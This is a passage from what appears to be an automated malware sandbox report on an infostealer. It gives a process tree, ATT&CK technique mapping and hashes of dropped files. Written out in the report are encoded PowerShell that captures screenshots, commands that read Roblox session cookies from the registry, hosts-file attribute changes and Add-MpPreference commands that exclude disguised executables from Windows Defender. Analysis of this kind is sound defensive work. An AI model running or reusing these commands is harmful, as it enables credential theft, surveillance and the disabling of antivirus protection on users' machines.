0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
4⤵
- Suspicious use of WriteProcessMemory
PID:1124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3996

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bnejusms\bnejusms.cmdline"
6⤵
PID:5616

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E86.tmp" "c:\Users\Admin\AppData\Local\Temp\bnejusms\CSCDC15654FC9184F88AE3E8F38888FD97D.TMP"
7⤵
PID:5852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:2092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:4120

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:5256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
4⤵
PID:5352

C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5392

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:5688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
4⤵
PID:5796

C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:6000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5988

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:6108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:6128

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:844

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:3852

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:5124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:3444

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:5296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:5324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
4⤵
PID:5720

C:\Windows\system32\getmac.exe
getmac
5⤵
PID:4060

C:\Windows\Runtime broker.exe
"C:\Windows\Runtime broker.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Runtime broker.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime broker.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Runtime Broker.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3608

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8740e7db6a0d290c198447b1f16d5281

SHA1
ab54460bb918f4af8a651317c8b53a8f6bfb70cd

SHA256
f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

SHA512
d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
7274a07d1b80de6f66290b47588cee3b

SHA1
d926b384806c755fe6b9d03f68852765aabb5703

SHA256
5eba7517357473e4d5d7ede75c3768069c578d2b0023473fd67f76b373430de8

SHA512
b7813fea9091298d48c87b259b0d4473ddc4480667f82ed6b5f8bdfa600590dcbfb1d62cbaca649dcf321d85cb786bf62d48826ab04297a22b7c88439b94bcf3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e5ea61f668ad9fe64ff27dec34fe6d2f

SHA1
5d42aa122b1fa920028b9e9514bd3aeac8f7ff4b

SHA256
8f161e4c74eb4ca15c0601ce7a291f3ee1dc0aa46b788181bfe1d33f2b099466

SHA512
cb308188323699eaa2903424527bcb40585792f5152aa7ab02e32f94a0fcfe73cfca2c7b3cae73a9df3e307812dbd18d2d50acbbfeb75d87edf1eb83dd109f34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5c964bb22371323b8064895892ab211e

SHA1
a23e9564b96d7a3e8b4a90abd0c7993d87e314fe

SHA256
80229da91bb7b07ea68d18e5a89a54988520c314030b252bd0e14584bbb0669f

SHA512
dd32dc25e1150fe04d0dde6677d3a555cd7c0428faf2ad071e4bb7e434c808c6c17186e55867330f78f528009b74e511644f1278815551c3e19b37532151f1c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
522b7b1f178db884b72cc2f9a110faed

SHA1
933de1e71986d4c4547afd900c6b39bcdfda44fc

SHA256
032a3660ba5c8a6b2936b412407bba08383d7f50f3db5c2a8f646472501f7583

SHA512
d6592a2cb8a763fde5241828ee1027382524a2157bc60b3d7376a603351f714c04e10cefcff7d89a0ea945ed4c34f545478d0cdbd3b6d4d68a97221070fb0993

Download Submit
C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll
Filesize
323KB

MD5
8610f4d3cdc6cc50022feddced9fdaeb

SHA1
4b60b87fd696b02d7fce38325c7adfc9e806f650

SHA256
ac926c92ccfc3789a5ae571cc4415eb1897d500a79604d8495241c19acdf01b9

SHA512
693d1af1f89470eab659b4747fe344836affa0af8485b0c0635e2519815e5a498f4618ea08db9dcf421aac1069a04616046207ee05b9ed66c0a1c4a8f0bddd09

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7E86.tmp
Filesize
1KB

MD5
2e3974ff3f663708e51d1c03a424188f

SHA1
a807a09b74f4cf807c72abf485c844d315f57169

SHA256
e355f5f6b6bacbd3f6fb506a56b29790920b23f644d6f57f20398d837502cf22

SHA512
c9f221c2dace3a56bac493e142fcbf015eb2579cce36e36f616aa5ea470385cedf38a678dd6f054ef700f42f9bb5d2492ada2d8b138262bbfe8d69fe5802c127

Download Submit
C:\Users\Admin\AppData\Local\Temp\Reaper.exe
Filesize
42KB

MD5
c7d407dbbe4d83fc37f2fa4f51276c76

SHA1
c6f1f596be6a99566d5862a0aa2f16b90eecb05c

SHA256
fc69c7aee21fa012c9e9de28e35c20eb9ddf473c0ac0b482faebc203dd97999c

SHA512
ed49a442172bdadd6f91db48db3003c5cb749868e9c40a90e8f6b65cdf4b6899d0132cfd70fb08a248412118353d0b4477606385244b90e0883ecdda213403c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\VCRUNTIME140.dll
Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_bz2.pyd
Filesize
48KB

MD5
2d461b41f6e9a305dde68e9c59e4110a

SHA1
97c2266f47a651e37a72c153116d81d93c7556e8

SHA256
abbe3933a34a9653a757244e8e55b0d7d3a108527a3e9e8a7f2013b5f2a9eff4

SHA512
eef132df6e52eb783bad3e6af0d57cb48cda2eb0edb6e282753b02d21970c1eea6bab03c835ff9f28f2d3e25f5e9e18f176a8c5680522c09da358a1c48cf14c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_ctypes.pyd
Filesize
58KB

MD5
1adfe4d0f4d68c9c539489b89717984d

SHA1
8ae31b831b3160f5b88dda58ad3959c7423f8eb2

SHA256
64e8fd952ccf5b8adca80ce8c7bc6c96ec7df381789256fe8d326f111f02e95c

SHA512
b403cc46e0874a75e3c0819784244ed6557eae19b0d76ffd86f56b3739db10ea8deec3dc1ca9e94c101263d0ccf506978443085a70c3ab0816885046b5ef5117

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_hashlib.pyd
Filesize
35KB

MD5
f10d896ed25751ead72d8b03e404ea36

SHA1
eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb

SHA256
3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3

SHA512
7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_lzma.pyd
Filesize
85KB

MD5
3798175fd77eded46a8af6b03c5e5f6d

SHA1
f637eaf42080dcc620642400571473a3fdf9174f

SHA256
3c9d5a9433b22538fc64141cd3784800c567c18e4379003329cf69a1d59b2a41

SHA512
1f7351c9e905265625d725551d8ea1de5d9999bc333d29e6510a5bca4e4d7c1472b2a637e892a485a7437ea4768329e5365b209dd39d7c1995fe3317dc5aecdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_queue.pyd
Filesize
25KB

MD5
decdabaca104520549b0f66c136a9dc1

SHA1
423e6f3100013e5a2c97e65e94834b1b18770a87

SHA256
9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84

SHA512
d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_socket.pyd
Filesize
43KB

MD5
bcc3e26a18d59d76fd6cf7cd64e9e14d

SHA1
b85e4e7d300dbeec942cb44e4a38f2c6314d3166

SHA256
4e19f29266a3d6c127e5e8de01d2c9b68bc55075dd3d6aabe22cf0de4b946a98

SHA512
65026247806feab6e1e5bf2b29a439bdc1543977c1457f6d3ddfbb7684e04f11aba10d58cc5e7ea0c2f07c8eb3c9b1c8a3668d7854a9a6e4340e6d3e43543b74

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_sqlite3.pyd
Filesize
56KB

MD5
eb6313b94292c827a5758eea82d018d9

SHA1
7070f715d088c669eda130d0f15e4e4e9c4b7961

SHA256
6b41dfd7d6ac12afe523d74a68f8bd984a75e438dcf2daa23a1f934ca02e89da

SHA512
23bfc3abf71b04ccffc51cedf301fadb038c458c06d14592bf1198b61758810636d9bbac9e4188e72927b49cb490aeafa313a04e3460c3fb4f22bdddf112ae56

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_ssl.pyd
Filesize
62KB

MD5
2089768e25606262921e4424a590ff05

SHA1
bc94a8ff462547ab48c2fbf705673a1552545b76

SHA256
3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca

SHA512
371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\base_library.zip
Filesize
1.8MB

MD5
e17ce7183e682de459eec1a5ac9cbbff

SHA1
722968ca6eb123730ebc30ff2d498f9a5dad4cc1

SHA256
ff6a37c49ee4bb07a763866d4163126165038296c1fb7b730928297c25cfbe6d

SHA512
fab76b59dcd3570695fa260f56e277f8d714048f3d89f6e9f69ea700fca7c097d0db5f5294beab4e6409570408f1d680e8220851fededb981acb129a415358d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\blank.aes
Filesize
114KB

MD5
b22152db64d0dbf9ea412cee1ea65c57

SHA1
b17afb2a610792c50ecd4077f97f2916ddf3f3a9

SHA256
f6fe141803df7ee3083c013aa24e21171c12a6019d82acd4b01d66084c9a1993

SHA512
7b1311359eb2933852f44f2c6554740824d9049fa10f93b2e10838a14d0f6331f904c352d6d8754795e35e1d182b74556f5182c4c7f7a908aabea7bb217873ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\libcrypto-1_1.dll
Filesize
1.1MB

MD5
dffcab08f94e627de159e5b27326d2fc

SHA1
ab8954e9ae94ae76067e5a0b1df074bccc7c3b68

SHA256
135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15

SHA512
57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\libffi-8.dll
Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\libssl-1_1.dll
Filesize
204KB

MD5
8e8a145e122a593af7d6cde06d2bb89f

SHA1
b0e7d78bb78108d407239e9f1b376e0c8c295175

SHA256
a6a14c1beccbd4128763e78c3ec588f747640297ffb3cc5604a9728e8ef246b1

SHA512
d104d81aca91c067f2d69fd8cec3f974d23fb5372a8f2752ad64391da3dbf5ffe36e2645a18a9a74b70b25462d73d9ea084318846b7646d39ce1d3e65a1c47c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\python311.dll
Filesize
1.6MB

MD5
5792adeab1e4414e0129ce7a228eb8b8

SHA1
e9f022e687b6d88d20ee96d9509f82e916b9ee8c

SHA256
7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967

SHA512
c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\select.pyd
Filesize
25KB

MD5
90fea71c9828751e36c00168b9ba4b2b

SHA1
15b506df7d02612e3ba49f816757ad0c141e9dc1

SHA256
5bbbb4f0b4f9e5329ba1d518d6e8144b1f7d83e2d7eaf6c50eef6a304d78f37d

SHA512
e424be422bf0ef06e7f9ff21e844a84212bfa08d7f9fbd4490cbbcb6493cc38cc1223aaf8b7c9cd637323b81ee93600d107cc1c982a2288eb2a0f80e2ad1f3c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\sqlite3.dll
Filesize
622KB

MD5
395332e795cb6abaca7d0126d6c1f215

SHA1
b845bd8864cd35dcb61f6db3710acc2659ed9f18

SHA256
8e8870dac8c96217feff4fa8af7c687470fbccd093d97121bc1eac533f47316c

SHA512
8bc8c8c5f10127289dedb012b636bc3959acb5c15638e7ed92dacdc8d8dba87a8d994aaffc88bc7dc89ccfeef359e3e79980dfa293a9acae0dc00181096a0d66

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\ucrtbase.dll
Filesize
987KB

MD5
a4781a4c41ada12c5420ee2b9bcbfda3

SHA1
7c394165fafd176908f38c6c5ffe065751b6a868

SHA256
0ef5cc705f0752489ea8f2a79116ca842142cee9f2bbb60ef24e2524b0066a09

SHA512
0055a67d02c59d5f63a3d7b56fe934ae56a80fc56e11819de62ae567fca74724ac6bc885bac37cd3f11a7abd243b9990f8edd674becd7b7a4f89a3325ebab104

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48322\unicodedata.pyd
Filesize
295KB

MD5
c2556dc74aea61b0bd9bd15e9cd7b0d6

SHA1
05eff76e393bfb77958614ff08229b6b770a1750

SHA256
987a6d21ce961afeaaa40ba69859d4dd80d20b77c4ca6d2b928305a873d6796d

SHA512
f29841f262934c810dd1062151aefac78cd6a42d959a8b9ac832455c646645c07fd9220866b262de1bc501e1a9570591c0050d5d3607f1683437dea1ff04c32b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0xzcdrdd.eyc.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bnejusms\bnejusms.dll
Filesize
4KB

MD5
8e205f5f7cdfaf7267b39d1f6483157b

SHA1
5c33aa4ce6a6894961b73ed998df3745aa65a85e

SHA256
00948aa534dfd2089a5bc93c12009112696fa6d9c1306ff0ec310212484a8eea

SHA512
80cdccae2fdcf9e7dfaca0b1cba452c1fb96584b186c87d42ca1371c8b9daab489705de66622ca1b43887e46a17d3c3ea54d11f044146774a3f12e09cadc5a8c

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
Filesize
7.8MB

MD5
69d5b0d4d9bb2fbbf840b97c802def96

SHA1
18420ab2e4e873c38b5563d7a07517c46525a62b

SHA256
08b995c990a12834a7712dd237ea2efa85762ac21bb6752c4453381531061a95

SHA512
35c0bdc92630766f857b9770aea12398d8dcc408ff6d2f2a182acab7c3ec9ff0c1cb7bcb243c2c007d62c30e6e595effcd62b2bc046ae98752c2901cc7bacc49

Download Submit
C:\Windows\Runtime broker.exe
Filesize
80KB

MD5
4de8d786d98e91b729b922d851ffb999

SHA1
0d201186b3749418cf83f047cda5f3933cae6178

SHA256
2b2cccac0931eedf03f91f48d012f993c9577ed554fdef8cd300438510feaff5

SHA512
8b921c96dc50a54b34c0ece345c399be84174969e46877d4b105c31931953bcd8879c85c38f19ef6d10da7882e4c10a9834386f7f34a014385d9c70312bbf13c

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
